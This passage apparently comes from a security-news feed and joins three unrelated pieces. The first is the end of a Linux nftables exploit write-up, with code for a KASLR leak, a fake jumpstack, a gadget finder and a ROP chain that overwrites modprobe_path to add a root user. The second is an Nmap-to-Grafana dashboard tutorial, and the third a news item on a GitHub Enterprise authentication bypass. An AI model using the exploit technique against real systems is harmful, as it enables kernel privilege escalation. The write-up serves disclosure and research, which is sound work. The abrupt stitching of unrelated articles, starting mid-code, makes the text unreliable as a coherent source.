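    """Rebase any other .text symbol once the slide is known."""
    return static_addr + slide
```

Every gadget address used later in the exploit is rebased the same way.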

Since it would be too inconvenient to reassemble these addresses manually, we could select the NFT registers containing the interesting data and add them to the set, leading to the following result:

table netdev {table_name} {
	map {set_name} {
		type 0x0 [invalid type] : 0x0 [invalid type]
		size 65535
		elements = { 0x88ffffe0 [invalid type] : 0x3a000000 [invalid type],     <== (1)
			           0xc9ffffa1 [invalid type] : 0xcfc281ff [invalid type] }    <== (2)   
	}
}

From the output we could clearly discern the shuffled regs (1) and nft_do_chain (2) addresses.
To explain how this infoleak works, I had to map out the stack layout at the time of the overflow, as it stays the same upon different nft_do_chain runs.

The regs struct is initialized with zeros at the beginning of nft_do_chain, and is immediately followed by the nft_jumpstack struct, containing the list of rules to be evaluated on the next nft_do_chain call, in a stack-like format (LIFO).

The vulnerable memcpy source is evaluated from the vlanh pointer referring to the struct vlan_ethhdr veth local variable, which resides in the nft_payload_eval stack frame, since nft_payload_copy_vlan is inlined by the compiler.
The copy operation therefore looks something like the following:

State of the stack post-overflow

The red zones represent memory areas that have been corrupted with mostly unpredictable data, whereas the yellow ones are also partially controlled when pointing dst_u8 to the first register. The NFT registers are thus overwritten with data belonging to the nft_payload_eval stack frame, including the respective stack cookie and return address.

2.2 Elevating the tables

With a pretty solid infoleak at hand, it was time to move on to the memory corruption part.
While I was writing the initial vuln report, I tried switching the exploit register to the highest possible one (NFT_REG32_15) to see what would happen.

Surprisingly, I couldn’t reach the return address, indicating that a classic stack smashing scenario wasn’t an option. After a closer look, I noticed a substantially large structure, nft_jumpstack, which is 16*24 bytes long, absorbing the whole overflow.

2.2.1 Jumping between the stacks

The jumpstack structure I introduced in the previous section keeps track of the rules that have yet to be evaluated in the previous chains that have issued an NFT_JUMP verdict.

  • When the rule ruleA_1 in chainA desires to transfer the execution to another chain, chainB, it issues the NFT_JUMP verdict.
  • The next rule in chainA, ruleA_2, is stored in the jumpstack at the stackptr index, which keeps track of the depth of the call stack.
  • This is intended to restore the execution of ruleA_2 as soon as chainB has returned via the NFT_CONTINUE or NFT_RETURN verdicts.

This aspect of the nftables state machine isn’t that far from function stack frames, where the return address is pushed by the caller and then popped by the callee to resume execution from where it stopped.

While we can’t reach the return address, we can still hijack the program’s control flow by corrupting the next rule to be evaluated!

In order to corrupt as much regs-adjacent data as possible, the destination register should be changed to the last one, so that it’s clear how deep into the jumpstack the overflow goes.
After filling all registers with placeholder values and triggering the overflow, this was the result:

gef➤  p jumpstack
$334 = {{
    chain = 0x1017ba2583d7778c,         <== vlan_ethhdr data
    rule = 0x8ffff888004f11a,
    last_rule = 0x50ffff888004f118
  }, {
    chain = 0x40ffffc900000e09,
    rule = 0x60ffff888004f11a,
    last_rule = 0x50ffffc900000e0b
  }, {
    chain = 0xc2ffffc900000e0b,
    rule = 0x1ffffffff81d6cd,
    last_rule = 0xffffc9000f4000
  }, {
    chain = 0x50ffff88807dd21e,
    rule = 0x86ffff8880050e3e,
    last_rule = 0x8000000001000002      <== random data from the stack
  }, {
    chain = 0x40ffff88800478fb,
    rule = 0xffff888004f11a,
    last_rule = 0x8017ba2583d7778c
  }, {
    chain = 0xffff88807dd327,
    rule = 0xa9ffff888004764e,
    last_rule = 0x50000000ef7ad4a
  }, {
    chain = 0x0 ,
    rule = 0xff00000000000000,
    last_rule = 0x8000000000ffffff
  }, {
    chain = 0x41ffff88800478fb,
    rule = 0x4242424242424242,         <== regs are copied here: full control over rule and last_rule
    last_rule = 0x4343434343434343
  }, {
    chain = 0x4141414141414141,
    rule = 0x4141414141414141,
    last_rule = 0x4141414141414141
  }, {
    chain = 0x4141414141414141,
    rule = 0x4141414141414141,
    last_rule = 0x8c00008112414141

The copy operation is large enough to include the whole regs buffer in the source, which means that we can partially control the jumpstack!
The gef output shows how only the end of our 251-byte overflow is controllable and, if aligned correctly, it can overwrite the 8th and 9th rule and last_rule pointers.
To confirm that we are breaking something, we could just jump to 9 consecutive chains, and when evaluating the last one trigger the overflow and hopefully jump to jumpstack[8].rule:
As expected, we get a protection fault:

[ 1849.727034] general protection fault, probably for non-canonical address 0x4242424242424242: 0000 [#1] PREEMPT SMP NOPTI
[ 1849.727034] CPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.2.0-rc1 #5
[ 1849.727034] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 1849.727034] RIP: 0010:nft_do_chain+0xc1/0x740
[ 1849.727034] Code: 40 08 48 8b 38 4c 8d 60 08 4c 01 e7 48 89 bd c8 fd ff ff c7 85 00 fe ff ff ff ff ff ff 4c 3b a5 c8 fd ff ff 0f 83 4
[ 1849.727034] RSP: 0018:ffffc900000e08f0 EFLAGS: 00000297
[ 1849.727034] RAX: 4343434343434343 RBX: 0000000000000007 RCX: 0000000000000000
[ 1849.727034] RDX: 00000000ffffffff RSI: ffff888005153a38 RDI: ffffc900000e0960
[ 1849.727034] RBP: ffffc900000e0b50 R08: ffffc900000e0950 R09: 0000000000000009
[ 1849.727034] R10: 0000000000000017 R11: 0000000000000009 R12: 4242424242424242
[ 1849.727034] R13: ffffc900000e0950 R14: ffff888005153a40 R15: ffffc900000e0b60
[ 1849.727034] FS: 0000000000000000(0000) GS:ffff88807dd00000(0000) knlGS:0000000000000000
[ 1849.727034] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1849.727034] CR2: 000055e3168e4078 CR3: 0000000003210000 CR4: 00000000000006e0

Let’s explore the nft_do_chain routine to understand what happened:

/* net/netfilter/nf_tables_core.c */

unsigned int nft_do_chain(struct nft_pktinfo *pkt, void *priv) {
	const struct nft_chain *chain = priv, *basechain = chain;
	const struct nft_rule_dp *rule, *last_rule;
	const struct net *net = nft_net(pkt);
	const struct nft_expr *expr, *last;
	struct nft_regs regs = {};
	unsigned int stackptr = 0;
	struct nft_jumpstack jumpstack[NFT_JUMP_STACK_SIZE];
	bool genbit = READ_ONCE(net->nft.gencursor);
	struct nft_rule_blob *blob;
	struct nft_traceinfo info;

	info.trace = false;
	if (static_branch_unlikely(&nft_trace_enabled))
		nft_trace_init(&info, pkt, &regs.verdict, basechain);
do_chain:
	if (genbit)
		blob = rcu_dereference(chain->blob_gen_1);       // Get correct chain generation
	else
		blob = rcu_dereference(chain->blob_gen_0);

	rule = (struct nft_rule_dp *)blob->data;          // Get first and last rules in chain
	last_rule = (void *)blob->data + blob->size;
next_rule:
	regs.verdict.code = NFT_CONTINUE;
	for (; rule < last_rule; rule = nft_rule_next(rule)) {   // 3. for each rule in chain
		nft_rule_dp_for_each_expr(expr, last, rule) {    // 4. for each expr in rule
			...
			expr_call_ops_eval(expr, &regs, pkt);    // 5. expr->ops->eval()

			if (regs.verdict.code != NFT_CONTINUE)
				break;
		}

		...
		break;
	}

	...
switch (regs.verdict.code) {
	case NFT_JUMP:
		/*
			1. If we're jumping to the next chain, store a pointer to the next rule of the 
      current chain in the jumpstack, increase the stack pointer and switch chain
		*/
		if (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE))
			return NF_DROP;	
		jumpstack[stackptr].chain = chain;
		jumpstack[stackptr].rule = nft_rule_next(rule);
		jumpstack[stackptr].last_rule = last_rule;
		stackptr++;
		fallthrough;
	case NFT_GOTO:
		chain = regs.verdict.chain;
		goto do_chain;
	case NFT_CONTINUE:
	case NFT_RETURN:
		break;
	default:
		WARN_ON_ONCE(1);
	}
	/*
		2. If we got here then we completed the latest chain and can now evaluate
		the next rule in the previous one
	*/
	if (stackptr > 0) {
		stackptr--;
		chain = jumpstack[stackptr].chain;
		rule = jumpstack[stackptr].rule;
		last_rule = jumpstack[stackptr].last_rule;
		goto next_rule;
	}
		...

The first 8 jumps fall into case 1., where the NFT_JUMP verdict increases stackptr to align it with our controlled elements; then, on the 9th jump, we overwrite the 8th element containing the next rule and return from the current chain, landing on the corrupted one. At 2. the stack pointer is decremented and control is returned to the previous chain.
Finally, the next rule in chain 8 gets dereferenced at 3. (nft_rule_next(rule)); too bad we just filled it with 0x42s, causing the protection fault.

2.2.2 Controlling the execution flow

Other than the rule itself, there are other pointers that should be taken care of to prevent the kernel from crashing, especially the ones dereferenced by nft_rule_dp_for_each_expr when looping through all rule expressions:

/* net/netfilter/nf_tables_core.c */

#define nft_rule_expr_first(rule)	(struct nft_expr *)&rule->data[0]
#define nft_rule_expr_next(expr)	((void *)expr) + expr->ops->size
#define nft_rule_expr_last(rule)	(struct nft_expr *)&rule->data[rule->dlen]
#define nft_rule_next(rule)		(void *)rule + sizeof(*rule) + rule->dlen

#define nft_rule_dp_for_each_expr(expr, last, rule) \
        for ((expr) = nft_rule_expr_first(rule), (last) = nft_rule_expr_last(rule); \
             (expr) != (last); \
             (expr) = nft_rule_expr_next(expr))
  1. nft_do_chain requires rule to be smaller than last_rule to enter the outer loop. This is not an issue as we control both fields in the 8th element. Furthermore, rule will point to another address in the jumpstack we control, so as to reference valid memory.
  2. nft_rule_dp_for_each_expr thus calls nft_rule_expr_first(rule) to get the first expr from its data buffer, 8 bytes after rule. We can discard the result of nft_rule_expr_last(rule) since it won’t be dereferenced during the attack.
(remote) gef➤ p (int)&((struct nft_rule_dp *)0)->data
$29 = 0x8
(remote) gef➤ p *(struct nft_expr *) rule->data
$30 = {
  ops = 0xffffffff82328780,
  data = 0xffff888003788a38 "1374\377\377\377"
}
(remote) gef➤ x/10i 0xffffffff81a4fbdf
=> 0xffffffff81a4fbdf <nft_do_chain+143>:   cmp   r12,rbp
0xffffffff81a4fbe2 <nft_do_chain+146>:      jae   0xffffffff81a4feaf
0xffffffff81a4fbe8 <nft_do_chain+152>:      movzx eax,WORD PTR [r12]                  <== load rule into eax
0xffffffff81a4fbed <nft_do_chain+157>:      lea   rbx,[r12+0x8]                       <== load expr into rbx
0xffffffff81a4fbf2 <nft_do_chain+162>:      shr   ax,1
0xffffffff81a4fbf5 <nft_do_chain+165>:      and   eax,0xfff
0xffffffff81a4fbfa <nft_do_chain+170>:      lea   r13,[r12+rax*1+0x8]
0xffffffff81a4fbff <nft_do_chain+175>:      cmp   rbx,r13
0xffffffff81a4fc02 <nft_do_chain+178>:      jne   0xffffffff81a4fce5 <nft_do_chain+405>
0xffffffff81a4fc08 <nft_do_chain+184>:      jmp   0xffffffff81a4fed9 <nft_do_chain+905>

3. nft_do_chain calls expr->ops->eval(expr, regs, pkt); via expr_call_ops_eval(expr, &regs, pkt), so the dereference chain has to be valid and point to executable memory. Fortunately, all fields are at offset 0, so we can just place the expr, ops and eval pointers all next to each other to simplify the layout.

(remote) gef➤ x/4i 0xffffffff81a4fcdf
0xffffffff81a4fcdf <nft_do_chain+399>:      je    0xffffffff81a4feef <nft_do_chain+927>
0xffffffff81a4fce5 <nft_do_chain+405>:      mov   rax,QWORD PTR [rbx]                <== first QWORD at expr is expr->ops, store it into rax
0xffffffff81a4fce8 <nft_do_chain+408>:      cmp   rax,0xffffffff82328900 
=> 0xffffffff81a4fcee <nft_do_chain+414>:   jne   0xffffffff81a4fc0d <nft_do_chain+189>
(remote) gef➤ x/gx $rax
0xffffffff82328780 :    0xffffffff81a65410
(remote) gef➤ x/4i 0xffffffff81a65410
0xffffffff81a65410 <nft_immediate_eval>:    movzx eax,BYTE PTR [rdi+0x18]            <== first QWORD at expr->ops points to expr->ops->eval
0xffffffff81a65414 <nft_immediate_eval+4>:  movzx ecx,BYTE PTR [rdi+0x19]
0xffffffff81a65418 <nft_immediate_eval+8>:  mov   r8,rsi
0xffffffff81a6541b <nft_immediate_eval+11>: lea   rsi,[rdi+0x8]

In order to preserve as much space as possible, the layout for stack pivoting can be arranged inside the registers before the overflow. Since these values will be copied inside the jumpstack, we have enough time to perform the following steps:

  1. Setup a stack pivot payload to NFT_REG32_00 by repeatedly invoking nft_rule_immediate expressions as shown above. Remember that we had leaked the regs address.
  2. Add the vulnerable nft_rule_payload expression that will later overflow the jumpstack with the previously added registers.
  3. Refill the registers with a ROP chain to elevate privileges with nft_rule_immediate.
  4. Trigger the overflow: code execution will start from the jumpstack and then pivot to the ROP chain starting from NFT_REG32_00.

By following these steps we managed to store the eval pointer and the stack pivot routine on the jumpstack, which would’ve otherwise filled up the regs too quickly.
In fact, without this optimization, the required space would be:
8 (rule) + 8 (expr) + 8 (eval) + 64 (ROP chain) = 88 bytes
Unfortunately, the regs buffer can only hold 64 bytes.

By applying the described technique we can reduce it to:

  • jumpstack: 8 (rule) + 8 (expr) + 8 (eval) = 24 bytes
  • regs: 64 bytes (ROP chain) which will fit perfectly in the available space.
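The byte accounting behind this optimization can be double-checked directly:

```python
PTR = 8                  # one 64-bit pointer
REGS_BYTES = 16 * 4      # struct nft_regs data: 16 4-byte registers

# everything stored in the registers: rule + expr + eval + ROP chain
naive = 3 * PTR + 64
assert naive == 88 and naive > REGS_BYTES      # 88 bytes don't fit in 64

# split layout: fake pointers land on the jumpstack, chain stays in regs
jumpstack_part = 3 * PTR                       # rule + expr + eval
regs_part = 64                                 # ROP chain
assert jumpstack_part == 24
assert regs_part == REGS_BYTES                 # fits exactly
```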

Here is how I crafted the fake jumpstack to achieve initial code execution:

struct jumpstack_t fill_jumpstack(unsigned long regs, unsigned long kaslr) 
{
    struct jumpstack_t jumpstack = {0};
    /*
        align payload to rule
    */
    jumpstack.init = 'A';
    /*
        rule->expr will skip 8 bytes, here we basically point rule to itself + 8
    */
    jumpstack.rule =  regs + 0xf0;
    jumpstack.last_rule = 0xffffffffffffffff;
    /*
        point expr to itself + 8 so that eval() will be the next pointer
    */
    jumpstack.expr = regs + 0x100;
    /*
        we're inside nft_do_chain and regs is declared in the same function,
        finding the offset should be trivial: 
        stack_pivot = &NFT_REG32_00 - RSP
        the pivot will add 0x48 to RSP and pop 3 more registers, totaling 0x60
    */
    jumpstack.pivot = 0xffffffff810280ae + kaslr;
    unsigned char pad[32] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; /* 31 'A's + NUL */
    strcpy(jumpstack.pad, pad);
    return jumpstack;
}

2.2.3 Getting UID 0

The next steps consist in finding the right gadgets to build up the ROP chain and make the exploit as stable as possible.

There exist several tools to scan for ROP gadgets, but I found that most of them couldn’t deal with large images too well. Furthermore, for some reason, only ROPgadget manages to find all the stack pivots in function epilogues, even if it prints them as static offsets. Out of laziness, I scripted my own gadget finder based on objdump, which is useful for short relative pivots (rsp + small offset):

#!/bin/bash

objdump -j .text -M intel -d linux-6.1.6/vmlinux > obj.dump
grep -n '48 83 c4 30' obj.dump | while IFS=":" read -r line_num line; do
        ret_line_num=$((line_num + 7))
        if [[ $(awk "NR==$ret_line_num" obj.dump | grep ret) =~ ret ]]; then
                out=$(awk "NR>=$line_num && NR<=$ret_line_num" obj.dump)
                if [[ ! $out == *"mov"* ]]; then
                        echo "$out"
                        echo -e "\n-----------------------------"
                fi
        fi
done

In this example case we’re looking to increase rsp by 0x60, and our script will find all stack cleanup routines incrementing it by 0x30 and then popping 6 more registers to reach the desired offset:

ffffffff8104ba47:    48 83 c4 30       add rsp, 0x30
ffffffff8104ba4b:    5b                pop rbx
ffffffff8104ba4c:    5d                pop rbp
ffffffff8104ba4d:    41 5c             pop r12
ffffffff8104ba4f:    41 5d             pop r13
ffffffff8104ba51:    41 5e             pop r14
ffffffff8104ba53:    41 5f             pop r15
ffffffff8104ba55:    e9 a6 78 fb 00    jmp ffffffff82003300 <__x86_return_thunk>
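The displacement adds up as expected: the add handles 0x30 bytes and each of the six pops removes another 8:

```python
ADD_RSP = 0x30
POPPED_REGS = 6            # rbx, rbp, r12, r13, r14, r15

# total stack displacement of the epilogue before the final ret
total_pivot = ADD_RSP + POPPED_REGS * 8
assert total_pivot == 0x60  # matches the offset we need to reach
```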

Even though it seems to be calling a jmp, gdb can confirm that we’re indeed returning to the saved rip via ret:

(remote) gef➤ x/10i 0xffffffff8104ba47
0xffffffff8104ba47 <set_cpu_sibling_map+1255>:    add   rsp,0x30
0xffffffff8104ba4b <set_cpu_sibling_map+1259>:    pop   rbx
0xffffffff8104ba4c <set_cpu_sibling_map+1260>:    pop   rbp
0xffffffff8104ba4d <set_cpu_sibling_map+1261>:    pop   r12
0xffffffff8104ba4f <set_cpu_sibling_map+1263>:    pop   r13
0xffffffff8104ba51 <set_cpu_sibling_map+1265>:    pop   r14
0xffffffff8104ba53 <set_cpu_sibling_map+1267>:    pop   r15
0xffffffff8104ba55 <set_cpu_sibling_map+1269>:    ret

Of course, the script can be adjusted to look for different gadgets.

Now, as for the privesc itself, I went for the most convenient and simplest approach, that is overwriting the modprobe_path variable to run a userland binary as root. Since this technique is widely known, I’ll just leave an in-depth analysis here:
We’re assuming that STATIC_USERMODEHELPER is disabled.

In short, the payload does the following:

  1. pop rax; ret : Set rax = /tmp/runme where runme is the executable that modprobe will run as root when trying to find the right module for the specified binary header.
  2. pop rdi; ret: Set rdi = &modprobe_path, this is just the memory location for the modprobe_path global variable.
  3. mov qword ptr [rdi], rax; ret: Perform the copy operation.
  4. mov rsp, rbp; pop rbp; ret: Return to userland.
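Packed as qwords, such a chain could be laid out as in the following sketch. All gadget addresses are placeholders to be rebased with the KASLR slide, and the sketch uses an 8-byte path since a longer one, like /tmp/runme, would need a second write:

```python
import struct

# Placeholder static addresses: resolve these from the target build
# and add the KASLR slide before use.
POP_RAX_RET = 0xffffffff81000111
POP_RDI_RET = 0xffffffff81000222
MOV_PTR_RDI_RAX_RET = 0xffffffff81000333
MOV_RSP_RBP_POP_RBP_RET = 0xffffffff81000444
MODPROBE_PATH = 0xffffffff82000555

def build_rop(slide, path=b"/tmp/rr\x00"):
    """Lay out the 4-gadget modprobe_path overwrite as little-endian qwords."""
    assert len(path) == 8, "one qword per write"
    chain = [
        POP_RAX_RET + slide,
        struct.unpack("<Q", path)[0],       # rax = new path bytes
        POP_RDI_RET + slide,
        MODPROBE_PATH + slide,              # rdi = &modprobe_path
        MOV_PTR_RDI_RAX_RET + slide,        # *rdi = rax
        MOV_RSP_RBP_POP_RBP_RET + slide,    # unwind back toward userland
    ]
    return b"".join(struct.pack("<Q", g) for g in chain)

payload = build_rop(0)
assert len(payload) == 48   # 6 qwords, within the 64-byte regs budget
```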

While the first three gadgets are pretty straightforward and common to find, the last one requires some caution. Normally a kernel exploit would switch context by calling the so-called KPTI trampoline swapgs_restore_regs_and_return_to_usermode, a special routine that swaps the page tables and the required registers back to the userland ones by executing the swapgs and iretq instructions.
In our case, since the ROP chain is running in the softirq context, I’m not sure using the same method would have worked reliably; it’s probably better to first return to the syscall context and then run our code from userland.

Here is the stack frame from the ROP chain execution context:

gef➤ bt
#0 nft_payload_eval (expr=0xffff888805e769f0, regs=0xffffc90000083950, pkt=0xffffc90000883689) at net/netfilter/nft_payload.c:124
#1 0xffffffff81c2cfa1 in expr_call_ops_eval (pkt=0xffffc90000083b80, regs=0xffffc90000083950, expr=0xffff888005e769f0)
#2 nft_do_chain (pkt=pkt@entry=0xffffc90000083b80, priv=priv@entry=0xffff888005f42a50) at net/netfilter/nf_tables_core.c:264
#3 0xffffffff81c43b14 in nft_do_chain_netdev (priv=0xffff888805f42a50, skb=, state=)
#4 0xffffffff81c27df8 in nf_hook_entry_hookfn (state=0xffffc90000083c50, skb=0xffff888005f4a200, entry=0xffff88880591cd88)
#5 nf_hook_slow (skb=skb@entry=0xffff888005f4a200, state=state@entry=0xffffc90000083c50, e=e@entry=0xffff88800591cd00, s=s@entry=0...
#6 0xffffffff81b7abf7 in nf_hook_ingress (skb=) at ./include/linux/netfilter_netdev.h:34
#7 nf_ingress (orig_dev=0xffff888005ff0000, ret=, pt_prev=, skb=) at net/core,
#8 __netif_receive_skb_core (pskb=pskb@entry=0xffffc90000083cd0, pfmemalloc=pfmemalloc@entry=0x0, ppt_prev=ppt_prev@entry=0xffffc9...
#9 0xffffffff81b7b0ef in __netif_receive_skb_one_core (skb=, pfmemalloc=pfmemalloc@entry=0x0) at net/core/dev.c:548
#10 0xffffffff81b7b1a5 in __netif_receive_skb (skb=) at net/core/dev.c:5603
#11 0xffffffff81b7b40a in process_backlog (napi=0xffff888007a335d0, quota=0x40) at net/core/dev.c:5931
#12 0xffffffff81b7c013 in __napi_poll (n=n@entry=0xffff888007a335d0, repoll=repoll@entry=0xffffc90000083daf) at net/core/dev.c:6498
#13 0xffffffff81b7c493 in napi_poll (repoll=0xffffc90000083dc0, n=0xffff888007a335d0) at net/core/dev.c:6565
#14 net_rx_action (h=) at net/core/dev.c:6676
#15 0xffffffff82280135 in __do_softirq () at kernel/softirq.c:574

Any function between the last corrupted one and __do_softirq would work to exit gracefully. To simulate the end of the current chain evaluation we can just return to nf_hook_slow since we know the location of its rbp.

Yes, we should also disable maskable interrupts via a cli; ret gadget, but we wouldn’t have enough space, and besides, we will be discarding the network interface right after.

To prevent any deadlocks and random crashes caused by skipping over the nft_do_chain function, a NFT_MSG_DELTABLE message is immediately sent to flush all nftables structures and we quickly exit the program to disable the network interface connected to the new network namespace.
Therefore, gadget 4 just pops nft_do_chain’s rbp and runs a clean leave; ret, so we don’t have to worry about forcefully switching context.
As soon as execution is handed back to userland, a file with an unknown header is executed to trigger the executable under modprobe_path that will add a new user with UID 0 to /etc/passwd.

While this is in no way a data-only exploit, notice how the entire exploit chain lives inside kernel memory; this is crucial for bypassing mitigations:

  • KPTI requires page tables to be swapped to the userland ones while switching context; __do_softirq will take care of that.
  • SMEP/SMAP prevent us from reading, writing and executing code from userland while in kernel mode. Writing the whole ROP chain in kernel memory that we control allows us to fully bypass those measures as well.

2.3. Patching the tables

Patching this vulnerability is trivial, and the most straightforward change has been approved by Linux developers:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
			return false;

		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;

		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

While this fix is valid, I believe that simplifying the whole expression would have been better:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
			return false;

		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen = VLAN_ETH_HLEN + vlan_hlen - offset;

		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

since ethlen is initialized with len and never updated afterwards.
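Since the two fixes are algebraically identical, it's easy to brute-force the equivalence over the relevant input space (constants as in if_vlan.h):

```python
VLAN_ETH_HLEN = 18   # Ethernet header + one 802.1Q tag
VLAN_HLEN = 4        # one VLAN tag

def ethlen_patch(offset, length, vlan_hlen):
    """ethlen as computed by the accepted fix."""
    ethlen = length
    if offset + length > VLAN_ETH_HLEN + vlan_hlen:
        ethlen -= offset + length - VLAN_ETH_HLEN - vlan_hlen
    return ethlen

def ethlen_simplified(offset, length, vlan_hlen):
    """ethlen as computed by the proposed simplification."""
    ethlen = length
    if offset + length > VLAN_ETH_HLEN + vlan_hlen:
        ethlen = VLAN_ETH_HLEN + vlan_hlen - offset
    return ethlen

# both forms agree everywhere in the reachable input space
for off in range(VLAN_ETH_HLEN + VLAN_HLEN):
    for ln in range(1, 0x100):
        for vh in (0, VLAN_HLEN):
            assert ethlen_patch(off, ln, vh) == ethlen_simplified(off, ln, vh)
```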

The vulnerability existed since Linux v5.5-rc1 and has been patched with commit 696e1a48b1a1b01edad542a1ef293665864a4dd0 in Linux v6.2-rc5.

One possible approach to making this vulnerability class harder to exploit involves using the same randomization logic as the kernel stack (aka per-syscall kernel-stack offset randomization): by randomizing the kernel stack offset on each syscall entry, any KASLR leak is only valid for a single attempt. This security measure isn’t applied when entering the softirq context, as a new stack for those operations is allocated at a static address.

You can find the PoC with its kernel config on my GitHub profile. The exploit has purposefully been built with only a specific kernel version in mind, so as to make it harder to use for illicit purposes. Adapting it to another kernel would require the following steps:

  • Reshaping the kernel leak from the nft registers,
  • Finding the offsets of the new symbols,
  • Calculating the stack pivot length
  • etc.

In the end this was just a side project, but I’m glad I was able to push through the initial discomforts, as the final result is something I am really proud of. I highly suggest that anyone interested in kernel security and CTFs spend some time auditing the Linux kernel, both to make our OSs more secure and to have some fun!
I’m writing this article one year after the 0-day discovery, so I expect there to be some inconsistencies or mistakes; please let me know if you spot any.

I want to thank everyone who allowed me to delve into this research with no clear objective in mind, especially my team @ Betrusted and the HackInTheBox crew for inviting me to present my experience in front of so many great people! If you’re interested, you can watch my presentation here:

Nmap Dashboard with Grafana

Original text by hackertarget

Generate an Nmap Dashboard using Grafana and Docker to get a clear overview of the network and open services.

This weekend’s project uses a similar technique to the previous Zeek Dashboard to build an easy-to-deploy dashboard solution for Nmap results.

Building small deployments like this gives the operator a greater understanding of how the tools work, developing skills that can be used to implement custom solutions for your specific use cases.

Explore the Nmap Dashboard, and dig deeper into your network analysis.

Introduction to Nmap Visualisation

Nmap is a well-known port scanner for finding open network services. Beyond finding open ports, Nmap is able to identify services, operating systems and much more. These insights allow you to develop a detailed picture of a network or system. When viewing a single host the standard Nmap output options are sufficient, but when you are analysing multiple hosts, and perhaps even the same host over time, it becomes more difficult.

By parsing the Nmap XML and populating an SQLite database we can use a Grafana Dashboard to analyse the data.

A primary aim of these mini projects is to demonstrate how, by combining open source tools and building simple data processing pipelines, we can create elegant solutions with real-world use cases. At the same time, the analyst or administrator builds valuable skills integrating the tools.

Generating the SQLite Data Source

First up we need some Nmap results in XML format. You can run any nmap command with -oA myoutput to generate XML output. This generates output in all (A) forms, including XML.

user@ubuntu:~$ sudo nmap -sV -F --script=http-title,ssl-cert -oA myoutput 10.0.0.0/24

This command will create a file myoutput.xml. The two scripts we are using here (http-title / ssl-cert) are non-intrusive but can provide valuable insight into the service. The script and dashboard include queries to parse the results from these two scripts. It would be easy enough to extend the python script and dashboard queries for a specific use case with other scripts, such as Microsoft SMB or other protocols.

git clone https://github.com/hackertarget/nmap-did-what.git

To parse the myoutput.xml file and create the SQLite DB, we will run the included python script.

user@ubuntu:~$ cp myoutput.xml nmap-did-what/data/
user@ubuntu:~$ cd nmap-did-what/data/
user@ubuntu:~/nmap-did-what/data$ python3 nmap-to-sqlite.py myoutput.xml
user@ubuntu:~/nmap-did-what/data$ ls
nmap_results.db myoutput.xml

The sequence of commands above generates nmap_results.db from the XML. Running the script again on other Nmap XML will append to the database, so simply run it against any results you wish to analyse.

Note the nmap_results.db listed above; this is the SQLite database. The Grafana Dashboard is pre-configured with this DB as a data source, located in /data/ in the container.

Grafana and Docker Compose

Now that we have our SQLite data source with the Nmap data, we can start up the Grafana docker container and begin our analysis.

Rather than installing Grafana from scratch, this guide uses docker to deploy a usable system in as little as a few minutes. The docker-compose config builds Grafana with a custom Nmap Dashboard and the SQLite data source installed.

user@ubuntu:~$ cd nmap-did-what/grafana-docker/
user@ubuntu:~/nmap-did-what/grafana-docker$ sudo docker-compose up -d
user@ubuntu:~/nmap-did-what/grafana-docker$ sudo docker ps -a
CONTAINER ID   IMAGE             COMMAND       CREATED         STATUS                      PORTS                                       NAMES
daba724a6548   grafana/grafana   "/run.sh"     1 hours ago    Up 1 hours                 0.0.0.0:3000->3000/tcp, :::3000->3000/tcp   grafana

If you wish to customise the build, simply review the docker-compose.yml file. The dashboards and data sources directories contain the configuration for the creation of the SQLite data source and the Nmap Dashboard within the newly created Grafana container. These files could be extended to build multiple dashboards or use other data sources.

Accessing Grafana and Nmap Dashboard

Grafana should now be running on its default port of 3000, so from your browser access http://127.0.0.1:3000 (or whichever IP you are running on).

The initial login is admin/admin, and it must be changed on first login. The authentication information and any changes to the Grafana configuration are saved in the Grafana storage created by docker-compose.yml. The grafana-storage directory holds the running Grafana state, so you can stop and start the docker container with changes being saved. If you remove this data, the login credentials and any changes made to the Grafana configuration from the web console will be lost.

After accessing the Dashboard, the first thing you may need to change to see the data is the date range. Nmap data will then be accessible and filterable based on date / time.

Using cron or a scheduled task, you could run Nmap periodically and update the SQLite DB, building a near real-time dashboard that displays your current network status and running services.

Conclusion

In this post, we explored the powerful combination of Nmap and Grafana for network monitoring and visualization. By leveraging Nmap’s network scanning and Grafana’s intuitive dashboard creation, we were able to get a detailed picture of our network, identifying services and operating systems.

CVE-2024-4985 (CVSS 10): Critical Authentication Bypass Flaw Found in GitHub Enterprise Server

CVE-2024-4985 (CVSS 10): Critical Authentication Bypass Flaw Found in GitHub Enterprise Server

GitHub, the world’s leading software development platform, has disclosed a critical security vulnerability (CVE-2024-4985) in its self-hosted GitHub Enterprise Server (GHES) product. The vulnerability, which carries a maximum severity rating of 10 on the Common Vulnerability Scoring System (CVSS), could allow attackers to bypass authentication and gain unauthorized access to sensitive code repositories and data.

GitHub Enterprise Server is the self-hosted version of GitHub Enterprise, tailored for businesses seeking a secure and customizable environment for source code management. Installed on an organization’s own servers or private cloud, it enables collaborative development while providing robust security and administrative controls.

The flaw resides in the optional encrypted assertions feature of GHES’s SAML single sign-on (SSO) authentication mechanism. This feature, designed to enhance security, ironically became a weak link when an attacker could forge a SAML response, impersonating a legitimate user and potentially gaining administrator privileges.

This vulnerability was discovered through GitHub’s Bug Bounty program, which rewards security researchers for identifying and reporting vulnerabilities.

It is important to note that the vulnerability only affects instances where SAML SSO is enabled with encrypted assertions, which are not activated by default. Therefore, organizations not using SAML SSO or those using SAML SSO without encrypted assertions are not impacted by this security flaw.

The primary danger posed by CVE-2024-4985 is the ability of an attacker to gain unauthorized access to GHES instances. By forging a SAML response, attackers can effectively bypass authentication mechanisms and provision accounts with site administrator privileges. For organizations utilizing the vulnerable configuration, the consequences of exploitation could be dire, including unauthorized access to source code, data breaches, and potential disruption of development operations.

